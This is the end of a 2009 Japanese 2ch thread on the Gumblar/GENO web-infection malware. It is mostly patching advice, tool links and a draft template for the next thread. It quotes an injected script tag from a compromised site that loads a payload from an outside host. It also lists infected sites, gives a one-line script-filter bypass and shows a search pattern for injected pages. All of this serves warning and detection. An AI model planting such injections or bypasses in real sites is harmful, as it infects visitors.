890名無しさん@お腹いっぱい。:2009/11/29(日) 04:58:06
ようするに対策とかでFirefoxユーザが増えるとそれだけ狙われるので
ずっとIEでいてくださいねってこと
891名無しさん@お腹いっぱい。:2009/11/29(日) 04:59:09
いいえ
892名無しさん@お腹いっぱい。:2009/11/29(日) 05:03:39
さらにレベルを下げる気だな
893名無しさん@お腹いっぱい。:2009/11/29(日) 05:05:07
事実じゃん
894名無しさん@お腹いっぱい。:2009/11/29(日) 05:06:51
全部糞チェッカーのバージョン表記のセイ
895名無しさん@お腹いっぱい。:2009/11/29(日) 05:11:57
被害者か
かわいそうだがもう相手しない
896名無しさん@お腹いっぱい。:2009/11/29(日) 05:13:36
なに言ってんだか
897名無しさん@お腹いっぱい。:2009/11/29(日) 05:15:55
かわいそう
898名無しさん@お腹いっぱい。:2009/11/29(日) 05:20:18
こんなもんにかかるのはBlasterにかかった奴らと同程度だな
899名無しさん@お腹いっぱい。:2009/11/29(日) 06:00:38
流れも読めないアホが同じじゃないとか騒いでただけか
900名無しさん@お腹いっぱい。:2009/11/29(日) 06:03:26
ド素人が偉そうだな
901名無しさん@お腹いっぱい。:2009/11/29(日) 06:55:48
かわいそう
902名無しさん@お腹いっぱい。:2009/11/29(日) 07:05:00
かわいそう
903名無しさん@お腹いっぱい。:2009/11/29(日) 07:05:53
結局フラッシュだかadobeだか更新しとけばいいだけ
そうじゃないのもあるけどそれはまた別の話だろー
904名無しさん@お腹いっぱい。:2009/11/29(日) 07:12:08
そうだね♀
905名無しさん@お腹いっぱい。:2009/11/29(日) 07:25:36
>>771
CSSや画像やスクリプトをCGIで要求してくる大手サイトは今でもあるし
これからもアクセス解析や広告に使われて増えるはず。

・基本はスクリプト、オブジェクトを無効にして特定のドメインだけ許可。
・FireFoxならRequestPolicyでホワイトリストを作っていく
「YouTubeを見れる環境は危険だ」という認識くらいは持っていても悪くないと思う。

>>809
いや、俺は一般Windowsユーザーが「制限ユーザーを作る事」が難しいことだと思う。
906名無しさん@お腹いっぱい。:2009/11/29(日) 07:56:54
結局フラッシュだかadobeだか更新しとけばいいだけ
907名無しさん@お腹いっぱい。:2009/11/29(日) 08:00:54
なら一般Windowsユーザーとかいうのはホワイトリストがどうたらとか難しいな
908名無しさん@お腹いっぱい。:2009/11/29(日) 08:04:56
スクリプトはじこうとがんばるより元断たなきゃ
流行りだしたころは修正ファイルでてんだから
909名無しさん@お腹いっぱい。:2009/11/29(日) 09:19:05
noscriptタグの中にmetaタグでrefrsh先にbase64でscriptを書けばイチコロ
910名無しさん@お腹いっぱい。:2009/11/29(日) 13:34:31
やけに伸びてると思ったらひどいことになっててわろた
911名無しさん@お腹いっぱい。:2009/11/29(日) 13:47:26
淘汰は自然の摂理
912名無しさん@お腹いっぱい。:2009/11/29(日) 15:39:46
ループって怖くね
913名無しさん@お腹いっぱい。:2009/11/29(日) 18:14:00
youtubeは今のところどうかな?
改ざんとかされてない?
914名無しさん@お腹いっぱい。:2009/11/29(日) 18:22:26
ばーか
自分でソース見ろや
ばーか
915名無しさん@お腹いっぱい。:2009/11/29(日) 18:31:29
>>914
煽るな
916名無しさん@お腹いっぱい。:2009/11/29(日) 18:34:26
触るな
917名無しさん@お腹いっぱい。:2009/11/29(日) 21:31:27
youtubeとかかいざんされても
結局フラッシュだかadobeだか更新しとけばいいだけ
918名無しさん@お腹いっぱい。:2009/11/29(日) 22:06:20
今日もげのってるね
919sage:2009/11/30(月) 03:07:32
輝オート(メツブシ・デリカ専門店)の中古車情報ページが陥落
ttp://www●hikariauto●co●jp/u-carstock/index●php
</head><script src=http://steventoth●extra●hu/wpscripts/indx_260●php ></script><body

一昨日あたりからhuドメインばかり出てくるが・・・
ハンガリーに何かあるのか?
920名無しさん@お腹いっぱい。:2009/11/30(月) 03:12:48
お尻がゆるいだけじゃない
921919:2009/11/30(月) 03:25:53
sage入れる場所間違えたのナイショだぞorz

「日本大学歯学部同窓会」
ttp://aa-nusd●jp/
ここも陥落しとる。
922名無しさん@お腹いっぱい。:2009/11/30(月) 04:19:06
やばいよやばいよー
923名無しさん@お腹いっぱい。:2009/11/30(月) 04:45:22
日歯大のやつ、http://www.gred.jp/ ここは検知するけど
       http://www.aguse.jp/ これはスルーする。
924名無しさん@お腹いっぱい。:2009/11/30(月) 13:03:48
>>923
hispaniaforex拾ってきたよ。
ttp://www.virustotal.com/jp/analisis/a2357ace3545a71c8e012ec7001cda765a0bae296b5b8ab578f1cfabd19b7f06-1259553217
Gumblarはアクセス制御をおこなっていて、
同一IPによる後からのアクセスには無害な404を返す
(php=html単体は複数回採取できたりするので
pdfやswfを触るとそれ以降は蹴られるっぽい)。

aguseで調べた人が2人以上居たんでしょ。
ソースチェッカーではキャッシュ表示がデフォで、
キャッシュ削除されても「Proxy」にチェック入れると
たいてい取得できるんだけど、aguseはその辺がな…。
925名無しさん@お腹いっぱい。:2009/11/30(月) 13:04:11
なんか似たようなこと半年前も見たような気がするぞw
926名無しさん@お腹いっぱい。:2009/11/30(月) 20:04:17
aguseは対応しとらんよ。(5月の時のものは検出するけど
927名無しさん@お腹いっぱい。:2009/12/01(火) 01:27:18
次スレ用のテンプラ(案)

*スレタイ*
【Gumblar】GENOウイルススレ★23【Gumblar.x】

*内容*
【感染しないように行っておくべき対策】
・Windows Update (Microsoft Update)
自動更新を有効にして、常に最新の状態を保つ。

・Adobe Flash Playerのアップデート
ttp://get.adobe.com/jp/flashplayer/

・Adobe (Acrobat) Readerのアップデート
ttp://get.adobe.com/jp/reader/
※JavaScriptはOFFにしておく事。


【webブラウザのJavaScriptをOFF】
・Firefox NoScriptを導入する。
・Google Chrome -disable-javascriptで起動。
・Opera ツール→設定→詳細設定タブ→「JavaScriptを有効にする」のチェックを外す。
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。


補足があったら追記をお願いします。
928名無しさん@お腹いっぱい。:2009/12/01(火) 01:31:36
>>927
いいかげんスレタイのメインにGENO入れるのやめないか?
↓こんなのとか

【新GENO】Gumblar.x / Daonolウイルススレ ★23
929名無しさん@お腹いっぱい。:2009/12/01(火) 01:39:13
>>927
もうちょっとあとで貼ろうかと思って用意していたテンプレ改変
うーむ、ゴテゴテしすぎかな

*** 2009年10月あたりから凶悪度を増した亜種が出回っています ***

■ Windows Update / Microsoft Updateを更新
 XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新(使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 Adobe Readerを開いて ヘルプ→アップデートの有無をチェック
■ Adobe Flash Playerを更新(動画サイト見てるなら絶対入ってる。IE版、非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp

以上でGumblar.x / Daonolは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (Sleipnir、IEでも上手に設定するとなんとかなります)
930929:2009/12/01(火) 01:42:06
〜〜〜 つづき 〜〜〜
優先度低
■ Vistaの人ははUACをONにする
■ Adobe Shockwave Player (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Version 6 Update (Javascriptとは違うので注意)
ttp://www.java.com/ja/

感染が疑わしい人は迷わずクリーンインストール推奨です
また安全なPCからパスワード類の変更もしてください
931929:2009/12/01(火) 01:43:30
■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください

@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
ttp://www.nifty.com/security/vcheck/index.htm

■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1

■ 旧型GENOウイルスのまとめなど
*** 【注意!】10月からの亜種には無効な情報があります ***
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
*** 【注意!】10月からの亜種には無効な情報があります ***
932929:2009/12/01(火) 01:45:16
【前スレ】
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
【関連スレ】
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
http://pc11.2ch.net/test/read.cgi/sec/1245402584/
GENOウイルススレ 感染4台目 - インターネット板
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
http://changi.2ch.net/test/read.cgi/doujin/1244096936/



以上、好きなように使ってくれ
933名無しさん@お腹いっぱい。:2009/12/01(火) 04:13:56
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
934名無しさん@お腹いっぱい。:2009/12/01(火) 05:35:28
結局GENO入れてるのね・・・

マカフィーからお知らせが来てたので念のため
マルウェアの感染によりマカフィーのWebページが開けなくなる問題について
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp

このツール使うよりもリカバリーした方が良いと思うんだけど
症状にあるメールソフトでのエラーって他で聞かない気が
935名無しさん@お腹いっぱい。:2009/12/01(火) 06:01:27
なんの話だよ
936名無しさん@お腹いっぱい。:2009/12/01(火) 08:10:53
新種に感染したらどうなるの?
937名無しさん@お腹いっぱい。:2009/12/01(火) 09:37:55
>>928
一般ではすでにGENOウィルスで通ってるし
おそらく2chでの祭りが命名由来だから
名前を変えたら再流行したときにスレ誘導に困る、から
スレタイにGENOはのこすことになるはず
938名無しさん@お腹いっぱい。:2009/12/01(火) 12:46:12
>>937
Gumblar.x / Daonolあたりが表では一般的になっているから
2ch由来はすでに過去の話だと思うが
誘導は大事だから残すことには反対ではないが
本来のウイルス名がまったく入らないのはどうかと思う
立ってしまったからこれ以上は言わないが・・・
939名無しさん@お腹いっぱい。:2009/12/01(火) 13:20:54
UAC有効にしてれば効果有るというならWin7でも効果あるんじゃね
940名無しさん@お腹いっぱい。:2009/12/01(火) 13:35:59
【捕捉orz】GENOウイスルスレ★23【\(^o^)/オワタ】

こっちのほうが良かったのに・・・
941名無しさん@お腹いっぱい。:2009/12/01(火) 13:39:05
ウイスルか…
942名無しさん@お腹いっぱい。:2009/12/01(火) 13:59:51
個人情報をさらすマルウェア、Shareを通じて日本で流通
http://headlines.yahoo.co.jp/hl?a=20091130-00000006-zdn_ep-sci

これってエロゲーにsetup.exeを仕込まれてた例のアレ?
晒し会場(現在は404)
ttp://p3p.jp/top

winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1233404027
943名無しさん@お腹いっぱい。:2009/12/01(火) 14:21:55
何の話だよ
944名無しさん@お腹いっぱい。:2009/12/01(火) 16:11:44
ほんと何の話だよ
945名無しさん@お腹いっぱい。:2009/12/01(火) 18:15:23
今の所アップデートをちゃんとして、NoScriptいれておけば大丈夫なのかな?
怖くてたまらん…
946名無しさん@お腹いっぱい。:2009/12/01(火) 18:30:12
NoScriptは入れても入れなくてもどっちでもいい。
必須なのはWindowsや各種ソフトのぬかりないアップデートだけ。
947名無しさん@お腹いっぱい。:2009/12/01(火) 18:49:41
>>945
更新をしっかり確認すればおk
しっかり更新すれば無駄に不安がる必要はないと何度言えば
948名無しさん@お腹いっぱい。:2009/12/01(火) 19:24:07
>>946-947
ありがとう
恐すぎてセキュリティ意識が以前より高くなったよ…
949名無しさん@お腹いっぱい。:2009/12/01(火) 20:05:18
NoScript は信頼できるホストにも制限をかけるのと、
FRAME 関連にも制限をかけるのを忘れないように。
950名無しさん@お腹いっぱい。:2009/12/01(火) 20:27:29
ソースチェッカーオンラインが閉鎖したんだが
どうしよう?
951携帯で発掘作業中:2009/12/01(火) 20:28:27
ちょっとだけ掘ってみた。

tp://irasuto●karaaget●net/2/
tp://seopro●sakura●ne●jp/engine/seo5/
tp://www●idealgroup-24●com/sub4●html
tp://www●cafedeaiai●net/index.html
tp://www●tornadogames●com/

妙な業種ばかりだが・・・気にするな(苦笑)
952名無しさん@お腹いっぱい。:2009/12/01(火) 20:34:55
>>950
そういや年内には閉鎖するって言ってたな
953名無しさん@お腹いっぱい。:2009/12/01(火) 22:07:16
>>949
サンクス
チェックしてあった
954名無しさん@お腹いっぱい。:2009/12/01(火) 23:21:16
>>950
SCOからリンクしてたこのへんとかかな
http://web-sniffer.net/
955名無しさん@お腹いっぱい。:2009/12/01(火) 23:24:14
>>948
更新確認はちゃんとやるんだぞ
Adobeとかのサイトいって確認
MSUpdateの場合は更新があったときはその適用+再起動後に
もう1度確認して他の重要な更新がないことを確認
956名無しさん@お腹いっぱい。:2009/12/02(水) 08:41:52
アプリケーションの更新確認にはこういうのも使える。
http://secunia.com/vulnerability_scanning/personal/
957名無しさん@お腹いっぱい。:2009/12/02(水) 10:49:20
個人的にコレも推しておこう
Microsoft Baseline Security Analyzer
ttp://technet.microsoft.com/en-us/security/cc184924.aspx
958名無しさん@お腹いっぱい。:2009/12/02(水) 14:14:07
"<script src=http://*.php ></script><body*" の検索結果 約 3,590,000 件

アスタリスク使えたのね・・・
959名無しさん@お腹いっぱい。:2009/12/02(水) 14:59:36
>>955
サンクス
ちゃんと確認する
960名無しさん@お腹いっぱい。:2009/12/02(水) 15:41:59
某ブログで紹介されていたが

>>934 以外にも感染確認・駆除ツールが出ているな
すべての亜種に有効かは不明だが少しは安心できるだろ

How to remove malware belonging to the family Trojan-PSW.Win32.Kates
KatesKiller.exe
ttp://support.kaspersky.com/faq/?qid=208280701

アンラボ専用ワクチン(39 Win-Trojan/Daonol.Gen)
v3daonol.exe
ttp://www.ahnlab.co.jp/download/vdn_list.asp
961名無しさん@お腹いっぱい。:2009/12/02(水) 15:49:04
>Daonol.Gen
うは
少し前にどこかでそれ拾った
avastでひっかかってセーフだったけど
962名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43
Trojan-Downloader.JS.Gumblar.x 確認
www.jwell.com
963名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10
jsに突っ込まれてるね。
/js/font.js
/js/base.js
/inc/prog.js
964名無しさん@お腹いっぱい。:2009/12/03(木) 16:19:50
>>962-963
もしかして・・・
tp://www.golf-rescue.com/gaugedesign/putter/ga03tour.html
tp://www.tamete.net/
こいつらもソレだったりする?
965名無しさん@お腹いっぱい。:2009/12/03(木) 16:39:40
そこは何もないんじゃね
966名無しさん@お腹いっぱい。:2009/12/03(木) 18:04:26
まだまだ猛威を振るってますね。。
http://www.virustotal.com/jp/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1259829527

対応済み:AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応:Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他
967名無しさん@お腹いっぱい。:2009/12/03(木) 18:07:06
だからダウソ板に帰れって。
968名無しさん@お腹いっぱい。:2009/12/03(木) 18:08:43
いつになったらおさまるのやら
969名無しさん@お腹いっぱい。:2009/12/03(木) 20:30:04
316 名前:名無しさん@お腹いっぱい。 投稿日:2009/12/02(水) 14:02:21
>>259
それは分かっているが本アドを二重にチエキできる。
最近のウイルスはブラウザ経由よりメールの方が多いらしい。

>>288
GmailをOperaメールで開く。
Mozilla系ならseamonkyか?
Gmail大本営自体がウイルスチェキしてくれるので便利。

しかし仕事や目上の人にはwebmailでは失礼になるので
やむを得ず本アドを晒さなければならない時が稀にあるのも事実。
970名無しさん@お腹いっぱい。:2009/12/04(金) 07:28:01
これ、今週win7で2回感染したんだが。。。なんかありましたっけ?
971名無しさん@お腹いっぱい。:2009/12/04(金) 07:46:07
「なんか」じゃなくてお前がセキュリティダメダメの状態で
不用意にコード埋め込まれたサイト踏んだんだろ?

しかも2回も
972名無しさん@お腹いっぱい。:2009/12/04(金) 07:48:03
感染じゃなくて
たぶん検出しただけだろ
973名無しさん@お腹いっぱい。:2009/12/04(金) 07:54:09
7は感染するみたいじゃん
974名無しさん@お腹いっぱい。:2009/12/04(金) 09:19:17
Win7は感染しないとか勝手に思い込んでる時点で(ry
975名無しさん@お腹いっぱい。:2009/12/04(金) 09:28:14
さすがに対策してるだろ
本当に2回も感染したら馬鹿だ
976名無しさん@お腹いっぱい。:2009/12/04(金) 09:54:52
相変わらずOSのバージョンチェックしているように思えるが
そんなこと無いのか?
何でもかんでもGumblar.xの話じゃなくて
977名無しさん@お腹いっぱい。:2009/12/04(金) 11:16:12
7でもブラックスクリーン出てるみたいだが、結局詳細不明なのよね
978971:2009/12/04(金) 17:44:34
1回目は意味がわからんかったが、2回目は完全にgamblerの症状だった。
セキュリティはPandaだから、笹食べて休んでいたのかもな。
979名無しさん@お腹いっぱい。:2009/12/04(金) 17:59:28
Win7でも感染するのかぁ。

Virtual PCに入れてたWin7 Enterprise+ウイルスバスター2010(共に90日試用版)の環境で
クラッシュするようになったのはウイルスのせいだったんじゃろか?
マシンパワーとか、他に原因になり得ることが多いから、深く追及しないまま削除しちゃったよ。
980名無しさん@お腹いっぱい。:2009/12/04(金) 18:03:41
> Win7でも感染するのかぁ。

どこで?URLは?スクショある?
981名無しさん@お腹いっぱい。:2009/12/04(金) 18:07:40
感染してるのか確認が出来ないのが怖い
982979:2009/12/04(金) 18:27:29
イメージごとさっくり削除してしまったので詳細不明です。
開発者を偽った一般消費者でサーセンw

起動した後、MSとバスターのアップデートだけして、
特別どこかサイトを見て回ったりはしなかったと思うんだけど・・・。
983名無しさん@お腹いっぱい。:2009/12/04(金) 18:34:42
アップデートできてたなら違うんじゃね
984名無しさん@お腹いっぱい。:2009/12/05(土) 01:21:03
このウイルスでadobePhotoShopとかの設定は関係ありませんよね?
985名無しさん@お腹いっぱい。:2009/12/05(土) 02:01:50
ない
986名無しさん@お腹いっぱい。:2009/12/05(土) 02:04:37
ありがとうございます!
987名無しさん@お腹いっぱい。:2009/12/05(土) 13:10:39
.NET Frameworkもバージョン上げた方がいいのかなぁ?
988名無しさん@お腹いっぱい。:2009/12/05(土) 13:32:15
>987
Gumblar.xには関係ないけどあげとこうぜ
989名無しさん@お腹いっぱい。:2009/12/05(土) 15:59:52
>>988
パソコン買った時に入ってたままだ…あげとこうかな
990名無しさん@お腹いっぱい。:2009/12/05(土) 20:39:45
G`nomeさんの所で見たがJavaもアップデートしたほうがよさようだな
JustExploitはJavaの脆弱性(CVE-2008-5353)を利用するらしい

>今回の、JustExploit に誘導される改ざんされた一般Webサイトは、数日前まで
>Gumblar.X(*1) に関連するウィルスの感染に利用されていました。
>これは、Gumblar 関連の攻撃を行っていた攻撃者が、JustExploit を攻撃に
>利用するようになったか、新たに別の攻撃者に改ざんさせられたことが考えられます。
ttp://www-935.ibm.com/services/jp/index.wss/consultantpov/secpriv/b1333933
991名無しさん@お腹いっぱい。:2009/12/05(土) 21:30:09
flashに新たな脆弱性が見つかって来週中に更新くるらしいね
992名無しさん@お腹いっぱい。:2009/12/05(土) 21:35:37
みたいね
イラレも脆弱性のうpだてが必要とか
993名無しさん@お腹いっぱい。:2009/12/05(土) 21:37:49
>>989
AdobeReaderも勝手に入ってるから注意な
994名無しさん@お腹いっぱい。:2009/12/06(日) 14:29:16
それはメーカーがプリインストールしたんでそ。
XPに古いFlashPlayerが同梱されているとか
Vista移行は.NETFrameworkが同梱されているとかとは話が違う。
995名無しさん@お腹いっぱい。:2009/12/06(日) 21:11:18
AdobeReaderとかメーカーPCのほとんどはプリインスコだし
日常的に使うものだから更新するに越したことはないと思うけどなぁ
996名無しさん@お腹いっぱい。:2009/12/07(月) 00:23:11
AdobeReaderは使う機会ないからアンインスコしちゃった
997名無しさん@お腹いっぱい。:2009/12/07(月) 01:30:34
スレ埋め
998名無しさん@お腹いっぱい。:2009/12/07(月) 01:31:56
スレ埋め
999名無しさん@お腹いっぱい。:2009/12/07(月) 01:32:36
1000だったら998が感染
1000名無しさん@お腹いっぱい。:2009/12/07(月) 01:33:39
>>999
なんでやねん orz
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。